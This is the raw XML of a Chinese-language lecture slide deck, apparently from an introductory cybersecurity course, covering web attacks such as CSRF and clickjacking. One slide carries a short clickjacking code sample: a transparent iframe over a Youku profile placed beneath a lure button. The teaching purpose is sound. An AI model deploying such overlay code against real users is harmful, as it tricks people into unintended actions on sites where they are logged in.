              <a:t>隐私照片，不看后悔一辈子</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>的链接，耐不住内心躁动，立马点击了该危险的网站（页面代码如下图所示），但当这页面一加载，便会执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>submitForm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>这个方法来提交转账请求，从而将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Verdana" panose="020B0604030504040204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>块转给黑客。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01EA5278-7727-47E7-BF71-F6683AA6C639}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7949837" y="4043954"/>
            <a:ext cx="3458106" cy="2448440"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77A40759-B088-4348-BEC0-3E2D1CE69D16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8837212" y="6413698"/>
            <a:ext cx="1621701" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>CSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>样例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4008813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1E7CA-1164-C740-8181-60CC12A85EE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2.1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>节 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安全</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>--</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>点击劫持</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C362B605-5A22-4F10-9B67-01C17D60C363}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584529" y="983142"/>
            <a:ext cx="10769271" cy="1754326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>点击劫持是一种视觉欺骗的攻击手段。攻击者将需要攻击的网站通过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>嵌套的方式嵌入自己的网页中，并将 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设置为透明，在页面中透出一个按钮诱导用户点击。</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用户在登陆 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网站的系统后，被攻击者诱惑打开第三方网站，而第三方网站通过 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>引入了 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网站的页面内容，用户在第三方网站中点击某个按钮（被装饰的按钮），实际上是点击了 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>网站的按钮。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>接下来我们举个例子：我在优酷发布了很多视频，想让更多的人关注它，就可以通过点击劫持来实现</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77A40759-B088-4348-BEC0-3E2D1CE69D16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8303812" y="6413698"/>
            <a:ext cx="1621701" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>点击劫持结果样例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7404CFC4-60AE-4BB3-950A-131D82B1AEEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="974494" y="2996412"/>
            <a:ext cx="4518628" cy="3323987"/>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zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>iframe { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>width</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: 1440px; height: 900px; position: absolute; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>top: -0px; left: -0px; z-index: 2; -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>moz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-opacity: 0; opacity: 0; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>filter: alpha(opacity=0);} </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>button { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>position</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: absolute; top: 270px; left: 1150px; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>z-index: 1; width: 90px; height:40px; } </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/style&gt; ...... &lt;button&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>点击脱衣</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;/button&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"http://pic1.win4000.com/wallpaper/2018-03-19/5aaf2bf0122d2.jpg"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"http://i.youku.com/u/UMjA0NTg4Njcy"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>scrolling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A31515"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"no"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&lt;/iframe&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="文本框 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2E4F0421-5635-4F30-A114-B221C77C3944}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2064378" y="6413697"/>
            <a:ext cx="1621701" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" dirty="0">
                <a:latin typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="黑体" panose="02010609060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>点击劫持代码样例</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49AE0DFE-5F2A-412D-A745-B6FDBE37CB50}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6123813" y="2967339"/>
            <a:ext cx="5810250" cy="1307306"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="AutoShape 4" descr="https://image.fundebug.com/2019-01-31-07.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{95FB8662-4044-4DFC-9384-91815880210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5" name="图片 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{451DC37F-6011-4882-BBE6-B0F10FE72A49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7023926" y="4354872"/>
            <a:ext cx="4010024" cy="1721254"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1217734684"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="1_Office 主题">
  <a:themeElements>
    <a:clrScheme name="达芬奇的左手">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="44546A"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E7E6E6"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="2A3D52"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="FEBA01"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="0070C0"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="C00000"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="38526E"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="BFBFBF"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="2A3D52"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="C4AF99"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="自定义 6">
      <a:majorFont>
        <a:latin typeface="Arial"/>
        <a:ea typeface="微软雅黑 Light"/>
        <a:cs typeface=""/>
      </a:majorFont>
      <a:minorFont>
        <a:latin typeface="Arial"/>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6963</TotalTime>
  <Words>7019</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>492</Paragraphs>
  <Slides>57</Slides>
  <Notes>6</Notes>
  <HiddenSlides>1</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57</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="68" baseType="lpstr">
      <vt:lpstr>DengXian</vt:lpstr>
      <vt:lpstr>DengXian</vt:lpstr>
      <vt:lpstr>黑体</vt:lpstr>
      <vt:lpstr>华文细黑</vt:lpstr>
      <vt:lpstr>Microsoft YaHei</vt:lpstr>
      <vt:lpstr>微软雅黑 Light</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Verdana</vt:lpstr>
      <vt:lpstr>1_Office 主题</vt:lpstr>
      <vt:lpstr>网络空间安全导论</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>第1节 应用安全背景及现状</vt:lpstr>
      <vt:lpstr>第2节 应用安全的本质及原因</vt:lpstr>
      <vt:lpstr>第2.1节 Web和CDN安全</vt:lpstr>
      <vt:lpstr>第2.1节 Web安全--跨站脚本攻击</vt:lpstr>
      <vt:lpstr>第2.1节 Web安全--跨站请求伪造</vt:lpstr>
      <vt:lpstr>第2.1节 Web安全--点击劫持</vt:lpstr>
      <vt:lpstr>第2.1节 Web安全--URL跳转漏洞</vt:lpstr>
      <vt:lpstr>第2.1节 Web安全--SQL注入</vt:lpstr>
      <vt:lpstr>第2.1节 Web安全--OS命令注入攻击</vt:lpstr>
      <vt:lpstr>第2.1节 Web安全 </vt:lpstr>
      <vt:lpstr>第2.2节 CDN安全 </vt:lpstr>
      <vt:lpstr>第2.2节 CDN安全 </vt:lpstr>
      <vt:lpstr>第2.2节 CDN安全 </vt:lpstr>
      <vt:lpstr>第2.2节 CDN安全 </vt:lpstr>
      <vt:lpstr>第2.2节 CDN安全 </vt:lpstr>
      <vt:lpstr>第2.2节 CDN安全 </vt:lpstr>
      <vt:lpstr>第2.2节 CDN安全 </vt:lpstr>
      <vt:lpstr>第2.2节 CDN安全 </vt:lpstr>
      <vt:lpstr>第2.2节 CDN安全 </vt:lpstr>
      <vt:lpstr>第2.2节 CDN安全 </vt:lpstr>
      <vt:lpstr>第2.2节 CDN安全 </vt:lpstr>
      <vt:lpstr>第2.3节 社交网络安全 </vt:lpstr>
      <vt:lpstr>第2.3节 社交网络安全 </vt:lpstr>
      <vt:lpstr>第2.3节 社交网络安全 </vt:lpstr>
      <vt:lpstr>第2.3节 社交网络安全 </vt:lpstr>
      <vt:lpstr>第2.3节 社交网络安全 </vt:lpstr>
      <vt:lpstr>第2.4节 云计算安全 </vt:lpstr>
